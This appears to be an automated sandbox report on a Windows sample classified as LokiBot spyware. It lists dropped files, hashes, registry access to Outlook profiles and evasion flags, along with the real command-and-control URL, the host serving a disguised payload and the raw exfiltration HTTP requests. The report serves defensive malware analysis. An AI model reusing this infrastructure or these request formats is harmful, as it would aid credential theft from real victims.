Windows Analysis Report
o6OaOfrAQs.exe

ID:	829095
Product:	CloudBasic
Start time:	20:47:29
Start date:	17.03.2023
Sample:	o6OaOfrAQs.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	049ecad4587538c292e3ebeee5947eb5
SHA1:	12aabeb19083dd114b7b94c836b031de3945d2c9
SHA256:	cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\Kontos.ini	ASCII text, with CRLF line terminators	FB5EE2C0CAC332EC8390F50016EF0769	11D9FB52FE5289140B9D52A38B56F99512B3A3A7	C557AFE51AB22916E3423820A09D3805BF9DCDCECBEC4FE8DE2C67FB023BA631
C:\Users\user\AppData\Local\Temp\nsg7AC7.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	B0C77267F13B2F87C084FD86EF51CCFC	F7543F9E9B4F04386DFBF33C38CBED1BF205AFB3	A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77
C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb	data	D69FB7CE74DAC48982B69816C3772E4E	B1C04CDB2567DC2B50D903B0E1D0D3211191E065	8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	4FC7FC174E80C178225C2509027DF961	9FF62413EC0DD462F5F016EBC804F1D736D24796	866B31DD39B97DEDAFD0FBD5672639EE91B47AD319C47816B4F6D01BFF93FF8C
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\Profetiske.Byg	data	12DF13549A2F50FB06EAAC92D2F36C05	5E1CD0421664E97B44B2C26960F4D298DAED0C99	4EE38AAF3380FB3D7C4F57800A1692175C1D772E3A11028874CF2D8F5DC599F2
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\Sankekort.Sch209	data	3DAD0F9AF0356D18A46167665A352768	E5D083D2224DE4FC9105CB966CF3A53F9BB7D3C0	8A124F4091887491B8FABE0C0C694B95C2D76F68FB4E9292C59FA5971074899C
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Hjtideligholdelser\Liechtensteiner\Systemopstninger\pan-start-symbolic.symbolic.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	4308BBBAB1DB146494AE5ABB07B8E6DB	58121574EEB070E26DDD75A964F3548E176E58A4	EFB732049C674EB25BFCB2FA0CBCC45D24190BF1479C054647F424B31E34C828
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Hjtideligholdelser\Liechtensteiner\Systemopstninger\printer-symbolic.symbolic.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	38D787F55E22FB591135F9250CD259D4	0E135B0E1CA49A6E43DB4CB7596FAEA022E23924	1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Idolatrous\Kaes\pt-br.txt	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	7B02E1AE16E2E709D7C97DE560B4DBE9	191A54644417F7D36F5CB4182DCDB3737D74BE51	DA0B58F52BBC131F967942D1D8E9DE1B5721AE864BC21852A0AD4062332297CB
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Ravingly\Magnetoplasmadynamics\godsvognen\avatar-default-symbolic.svg	SVG Scalable Vector Graphics image	8B727826F9D8C0C7C954EDE912CB0DEB	1518AA80747326B5353C22D32E57A33D61285119	0783A7F518D3879C8F0F50B45FBD779A98652469E9B7C659CE41F14D1629D334
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\be.txt	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	3C21135144AC7452E7DB66F0214F9D68	B1EC0589D769EAB5E4E8F0F8C21B157EF5EBB47D	D095879B8BBC67A1C9875C5E9896942BACF730BD76155C06105544408068C59E
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\changes-allow-symbolic.svg	SVG Scalable Vector Graphics image	CB1EEE7BDB582B756D0F68EF02D6D96D	9E9B0F25BC472EF1C1C13EEAC12FD11C4CC0D2D9	20EA767E852A8EBF2C5BA16D56CBAE10BD09D6CBA89B372A57EAA973AD3281B4
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\dotnet.api	HTML document, ASCII text, with CRLF line terminators	5343C1A8B203C162A3BF3870D9F50FD4	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\ebook-reader.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	BFF011148B773FA44B9A9BB029E8CC52	F2B838927E320D12649CEFDEA3AFE383C6650D7C	B21DE7B432A7A67544D007ECC0FDD95F8E8C6129AF558A32102EE04C08635653
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\emblem-photos-symbolic.svg	SVG Scalable Vector Graphics image	379690952AAA576521D51249D404CBCD	61A8A95B0454422AA47379CF983B99FFDD839439	EAD402FB0B85DB153356EC695016FD4F2C4031367D8ED6D1C1EF5FF4F28A8DE8
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\font-select-symbolic.symbolic.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	C84EE7522C124892455BB09DEBCF9340	AF87A2A5688346A3902762DD250328B7EF224620	E0A3BD6FE1A1BAEFFE04BCA2980ADF755F888E31DCE3686B16C5DAC4202A38C8
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\network-wired-symbolic.symbolic.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	1ED278AD206D6EA33FF787DD326E0FC5	8CFF7AD12FC0E5545E71D05879A0245BEDAF4D46	CC88E76F7C7D2E5B07E49D1F2AD88F8BAFC0542EB11CEB2B2FFF235C87AB4417
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Unrivalled\Nonexhaustively\Snaffle\Stealthful\LogoCanary.png	PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced	F80867A421C85C6E2865CF85FF7C4B02	C3EAB6B7E92646FE3407B2B3C5AFFE13A7873C48	BCAA3B1333919176137D4DE4B1E3F31126159B12F959D7277BD8537B95139BD3

AV Detection

Source: o6OaOfrAQs.exe	Virustotal: Detection: 28%			Perma Link
Source: o6OaOfrAQs.exe	ReversingLabs: Detection: 51%

Source: http://185.246.220.85/habrik/five/fre.php

Avira URL Cloud: Label: malware

Compliance

Source: o6OaOfrAQs.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: o6OaOfrAQs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
Source:	Binary string: mshtml.pdb source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: mshtml.pdbUGP source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Spreading

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_0040626D FindFirstFileA,FindClose,		1_2_0040626D
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		1_2_00405732
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_004026FE FindFirstFileA,		1_2_004026FE

Networking

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49818 -> 185.246.220.85:80

Source: Joe Sandbox View	IP Address: 85.95.248.49 85.95.248.49
Source: Joe Sandbox View	IP Address: 185.246.220.85 185.246.220.85

Source: global traffic	HTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown	TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown	TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown	TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown	TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown	TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9

Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: o6OaOfrAQs.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: o6OaOfrAQs.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002505000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruhsalgelisim.com/jgEyxsZj50.ttf
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000003.4849423147.0000000032400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown

HTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close

Source: unknown

DNS traffic detected: queries for: ruhsalgelisim.com

Source: global traffic

HTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_004051CF

System Summary

Source: o6OaOfrAQs.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004031D6

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_00404A0E		1_2_00404A0E
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_004065F6		1_2_004065F6
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_6ED71A9C		1_2_6ED71A9C

Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs o6OaOfrAQs.exe

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: o6OaOfrAQs.exe

Static PE information: invalid certificate

Source: o6OaOfrAQs.exe	Virustotal: Detection: 28%
Source: o6OaOfrAQs.exe	ReversingLabs: Detection: 51%

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

File read: C:\Users\user\Desktop\o6OaOfrAQs.exe

Jump to behavior

Source: o6OaOfrAQs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe			Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004031D6

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

File created: C:\Users\user\AppData\Roaming\fumigatorium

Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

File created: C:\Users\user\AppData\Local\Temp\nsk77D8.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/19@1/2

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_004020D1 CoCreateInstance,MultiByteToWideChar,

1_2_004020D1

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_0040449B

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

File written: C:\Users\user\AppData\Local\Temp\Kontos.ini

Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: o6OaOfrAQs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
Source:	Binary string: mshtml.pdb source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: mshtml.pdbUGP source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation

Source: Yara match	File source: Process Memory Space: o6OaOfrAQs.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: 00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_6ED72F20 push eax; ret		1_2_6ED72F4E
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_03435F04 push es; ret		1_2_03435F06
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_034303E6 push 620F66DAh; iretd		1_2_034303EB
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_03430E2F push ds; ret		1_2_03430E38
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_0343208F push edx; retf		1_2_03432090
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 4_2_01665F04 push es; ret		4_2_01665F06
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 4_2_016603E6 push 620F66DAh; iretd		4_2_016603EB
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 4_2_01660E2F push ds; ret		4_2_01660E38
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 4_2_0166208F push edx; retf		4_2_01662090

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

1_2_6ED71A9C

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File created: C:\Users\user\AppData\Local\Temp\nsg7AC7.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
